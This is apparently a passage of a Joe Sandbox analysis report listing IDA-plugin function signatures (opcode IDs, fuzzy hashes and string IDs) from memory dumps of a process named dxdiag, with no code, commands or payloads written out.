                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: o]^
                                                                                                      • API String ID: 0-3943879297
                                                                                                      • Opcode ID: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
                                                                                                      • Instruction ID: 4669969d7b71f7d68a9b592d0a4a540a5b8527d65a8744ebe538e10e24e07286
                                                                                                      • Opcode Fuzzy Hash: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
                                                                                                      • Instruction Fuzzy Hash: 58B16C72B083205BD714DB24E89277BB3A1EFE1354F59842EE88557391E63CE805C39A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: q
                                                                                                      • API String ID: 0-1973602202
                                                                                                      • Opcode ID: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
                                                                                                      • Instruction ID: b69d45c65629a181d3394273b162446badd9582a993c74671e4135a58d3492d1
                                                                                                      • Opcode Fuzzy Hash: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
                                                                                                      • Instruction Fuzzy Hash: 8BC10075A583108BC7248F28CC913ABB3F1EF96314F48992DE8C59B394E778D944C78A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: {B
                                                                                                      • API String ID: 0-2955416605
                                                                                                      • Opcode ID: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
                                                                                                      • Instruction ID: 125d85a474e2c54c7edf7e8372bc309e0328607fb292080dea6794c80479f12b
                                                                                                      • Opcode Fuzzy Hash: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
                                                                                                      • Instruction Fuzzy Hash: C3A145B5A0C3508FD7108F28D89222BBBE1AF86304F54883EF5D58B352E638D905CB97
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 0-3772416878
                                                                                                      • Opcode ID: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
                                                                                                      • Instruction ID: 51a14242803ecae43574cd839083da134051b3b3a324024ad900f53de0fcc2f5
                                                                                                      • Opcode Fuzzy Hash: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
                                                                                                      • Instruction Fuzzy Hash: C5B149712097819FD325CF18C88061BFBE0AFA9704F544E2DE5D997382D635EA18CBA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: JR
                                                                                                      • API String ID: 0-3458893224
                                                                                                      • Opcode ID: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
                                                                                                      • Instruction ID: 44b59cc75133df7a41eb2e69763ada4243d618a4e2d430adff5262eca57ed642
                                                                                                      • Opcode Fuzzy Hash: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
                                                                                                      • Instruction Fuzzy Hash: 0E61C52128C3C19AC3118F7994A07A7FFE09FA3314F1849BDE8D45B382D379891AD766
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ~
                                                                                                      • API String ID: 0-1707062198
                                                                                                      • Opcode ID: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
                                                                                                      • Instruction ID: 6fa54e92a4b9978c13d68c63913922f98e05887ce952ffb0b0acc6151ef16d97
                                                                                                      • Opcode Fuzzy Hash: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
                                                                                                      • Instruction Fuzzy Hash: 04811972A442614FC721CE28CC9139BBB919B85324F19827EECB99B3D2D638DC46D7D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gfff
                                                                                                      • API String ID: 0-1553575800
                                                                                                      • Opcode ID: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
                                                                                                      • Instruction ID: b635ffe6758fa563810d355454ed740eab1994e1762da840ca45afbcef432b43
                                                                                                      • Opcode Fuzzy Hash: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
                                                                                                      • Instruction Fuzzy Hash: AF61D2B16083058BD354CF18C8417ABBBE6FBC9314F15892EE489D7392DB78D945CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: W
                                                                                                      • API String ID: 0-793274765
                                                                                                      • Opcode ID: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
                                                                                                      • Instruction ID: 1e5f2fd2993d5a5d00e1584304d987d2456e5e273d97887f4c8a7713582cd764
                                                                                                      • Opcode Fuzzy Hash: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
                                                                                                      • Instruction Fuzzy Hash: FE01D877B024018BC71CCF38C8A3565B7A3EB96215769627EC562DF3D9DE3498018648
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
                                                                                                      • Instruction ID: f3d5467b55631bdaa724751aa9045b56e4334b6402e67d183f6a87da8050b689
                                                                                                      • Opcode Fuzzy Hash: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
                                                                                                      • Instruction Fuzzy Hash: D152C471608B408FD364DF38C5953A7BBE1AB55314F18893ED8EB837C2E639A509C746
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
                                                                                                      • Instruction ID: cba84eeb8f78e0ae709cb9e2e748fe6274e4b764df0cc893636221a17d4e6bb5
                                                                                                      • Opcode Fuzzy Hash: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
                                                                                                      • Instruction Fuzzy Hash: 2452F1B0A08B849FE730DF24C4847A7BBE1AB51314F15883ED5E7167C2C37DA9958B1A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
                                                                                                      • Instruction ID: 86af1cb4bafd0ed74008c60c32463ec180b14810afe3fc4f9a0b4589affe1339
                                                                                                      • Opcode Fuzzy Hash: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
                                                                                                      • Instruction Fuzzy Hash: 476219B0508B819ED371CF3D8805786BFE5AB5A320F148A5EE4FAC7392D774A501CB66
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
                                                                                                      • Instruction ID: 1c54c97c46aa2ef6bdbd5d76da75d5e4d1013e71daecfc50a96a56d554505fa0
                                                                                                      • Opcode Fuzzy Hash: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
                                                                                                      • Instruction Fuzzy Hash: 6552F4715083459FCB14CF18C0806AABFE1BF89305F188A7EF8996B391D778E945CB89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                      • Instruction ID: e3b42c420a0ab721274a946c9fa7eab4dab2f787d0bed5ea88cf2f50095341df
                                                                                                      • Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                      • Instruction Fuzzy Hash: 5F22B332A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
                                                                                                      • Instruction ID: cb804480fa9771f3decfe968603f1fa251b047b45c1119fa1a0aece904f71b93
                                                                                                      • Opcode Fuzzy Hash: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
                                                                                                      • Instruction Fuzzy Hash: C8322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
                                                                                                      • Instruction ID: 8de7fec0fbf75a066610e9e7739594f8429d2466b2c872ee27e4363637c8b379
                                                                                                      • Opcode Fuzzy Hash: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
                                                                                                      • Instruction Fuzzy Hash: 9A22D3B5A08B408FD324DF38D4953ABBBE1AF55304F04893ED5EB87392E638A545CB46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
                                                                                                      • Instruction ID: f274cfa4fd23e6236676cd1f27d37eda4d2c4e9f7f04722437533fa671a78e6f
                                                                                                      • Opcode Fuzzy Hash: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
                                                                                                      • Instruction Fuzzy Hash: 03E11136718215CFCB08CF38D89126BB7E2EB8A314F1A857ED846D7391DB38D8058B85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
                                                                                                      • Instruction ID: 66bc5b333a0c6ee299b6e4738c483b6afcae0af6661c562ee48f541c7812e622
                                                                                                      • Opcode Fuzzy Hash: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
                                                                                                      • Instruction Fuzzy Hash: 71D14631608311ABD314DF24C88166FF7E1EB99718F15E92EE98593391D778DC05CB8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
                                                                                                      • Instruction ID: 193ede2baf899d4cd5aa5ba4271a00cee3d3de787d1d5f2eafa8c2ae60b57e67
                                                                                                      • Opcode Fuzzy Hash: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
                                                                                                      • Instruction Fuzzy Hash: ADF12931A083525BC714CE29C99016BB7E3AFC5324F198A2EE4E5673D5DB38ED068B85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                                                                                                      • Instruction ID: 5cf728b11992c65e55bd4be9dc5e9eb5593f12857077bfd5cee5c93eadafeb55
                                                                                                      • Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                                                                                                      • Instruction Fuzzy Hash: 78E179711087418FD720DF29C880B6BBBE1EF99304F44882EE4D597791E779E948CB96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
                                                                                                      • Instruction ID: 49bb995cc6258f3b287554f64d1e249e4e01c3de4c67095bf9184da5ae40cd93
                                                                                                      • Opcode Fuzzy Hash: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
                                                                                                      • Instruction Fuzzy Hash: 1BA13335A083118BC714DF29E88062BB7F2EF89310F09D56EE9918B395D779EC51CB86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000003.2303635403.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, Offset: 028EC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_3_28ec000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac4e9764799106399ea0a55fe331406335f49f2f1bbb736c59c700d4d6934696
                                                                                                      • Instruction ID: eb8249cc96f67d2796b34d915014014d264193f4e19930284e9afe2aecd0bc03
                                                                                                      • Opcode Fuzzy Hash: ac4e9764799106399ea0a55fe331406335f49f2f1bbb736c59c700d4d6934696
                                                                                                      • Instruction Fuzzy Hash: 55B1105944E3C10FD75B8BB44D7A591BF70AE2712470E86CFC9CA8F4A3E349984AD362
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
                                                                                                      • Instruction ID: 7ac7e3b168bbb7afd94fe29f1e54d1f5c433d12e6b19e411e96f11bbc3239d1b
                                                                                                      • Opcode Fuzzy Hash: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
                                                                                                      • Instruction Fuzzy Hash: 88B104B5908201AFD7209F64CC42B5ABBE1FBD5314F144A3EFC98A32A0D735D855DB8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
                                                                                                      • Instruction ID: ba8a09dc2418c02870105bc3f6dd75cfc533c2f59140fb6bc1d6151d28bd9c6f
                                                                                                      • Opcode Fuzzy Hash: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
                                                                                                      • Instruction Fuzzy Hash: CB910475A043019BD3189F29C89166BB7F2FFC9720F19A52EE895A7390D738EC41CB85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                      • Instruction ID: 86fd598b9c61968874822396d4ab8b809d08d2c2737f86e898986d6ce750098e
                                                                                                      • Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                      • Instruction Fuzzy Hash: 7FC15BB29087418FC360CF28DC86BABB7E1BF85318F09492DD5DAD6242E778A155CB46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
                                                                                                      • Instruction ID: 6dc5e2ab74ae951aaa46e5139dd55047cfb70fd72833bef498b558f7cf56f5ea
                                                                                                      • Opcode Fuzzy Hash: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
                                                                                                      • Instruction Fuzzy Hash: 81D19A205087D18ED326CB3C8848B897FE15B6B324F0A83D9D4E65F3E3C3699946C766
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
                                                                                                      • Instruction ID: 20f5ed072c6bfbda0bc91a0cdde0de7c4fc080ad42862f5d594c9abb615ab40b
                                                                                                      • Opcode Fuzzy Hash: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
                                                                                                      • Instruction Fuzzy Hash: F6912832B59A804BD72C897C4C623AABA834BD6234F2CC77EE6B6873E5D96C48454345
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
                                                                                                      • Instruction ID: 7a1eed898d1216762a2c7ff3d336fcba6ee216a9b47b043e4d7b41fbc61cb180
                                                                                                      • Opcode Fuzzy Hash: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
                                                                                                      • Instruction Fuzzy Hash: 4E711726B59AF047D328853D6C223B67A824FD6334F6DC36EE5F28B3E1D56D88058349
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
                                                                                                      • Instruction ID: 3490b61dfd93ba184312fd33364581a50fe03d296d349fd53c95ac3e2b442cca
                                                                                                      • Opcode Fuzzy Hash: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
                                                                                                      • Instruction Fuzzy Hash: 9C713A72714B008FD3249A3DC9823ABBBE2AB95314F18493ED5E7C33C6E63994168316
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
                                                                                                      • Instruction ID: c9e52aa4780a1a71b0f6536462f5c40a3ec639637a903cde8fa83514c66493a3
                                                                                                      • Opcode Fuzzy Hash: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
                                                                                                      • Instruction Fuzzy Hash: 33514C31A053118BD7209F2888C056FF792EFCA324F29A62EF59557361DB79EC0287D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
                                                                                                      • Instruction ID: 5fccf0568e07a38315d86764f9ee9d51859a75a7ad21a5e232c3aae3b42cafbc
                                                                                                      • Opcode Fuzzy Hash: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
                                                                                                      • Instruction Fuzzy Hash: 6651F6B2714B094BC708CE2CEC9123AB7D2ABD5204F99C63DE956C7381EF78E9158785
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
                                                                                                      • Instruction ID: a491210344505289bb21a907e851a53a7042adf8aad5960711688d9cdac3ce5c
                                                                                                      • Opcode Fuzzy Hash: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
                                                                                                      • Instruction Fuzzy Hash: 0D51E1B1A4C3118BC324CF14C89266BB7B2EF96704F59855EE8856B384E335EA45C78A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
                                                                                                      • Instruction ID: 53513fe6c79870b6d8cfb68088b58b425f5e81915f7a899e94c8849bc048f5ff
                                                                                                      • Opcode Fuzzy Hash: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
                                                                                                      • Instruction Fuzzy Hash: CF51FFB525C3108BC718CF24C8916ABB7F2EFD6704F48995DE4858B3A0E339D901C74A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
                                                                                                      • Instruction ID: 8cf5b8e416399a360e4fa64b07ba8964707688b42fdc82ebe9d8400aceb4da68
                                                                                                      • Opcode Fuzzy Hash: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
                                                                                                      • Instruction Fuzzy Hash: B8517A3BA18725CFDB04DF28E89025AB3A2FF8A351F1A847DDA8587242D734DD41CB85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
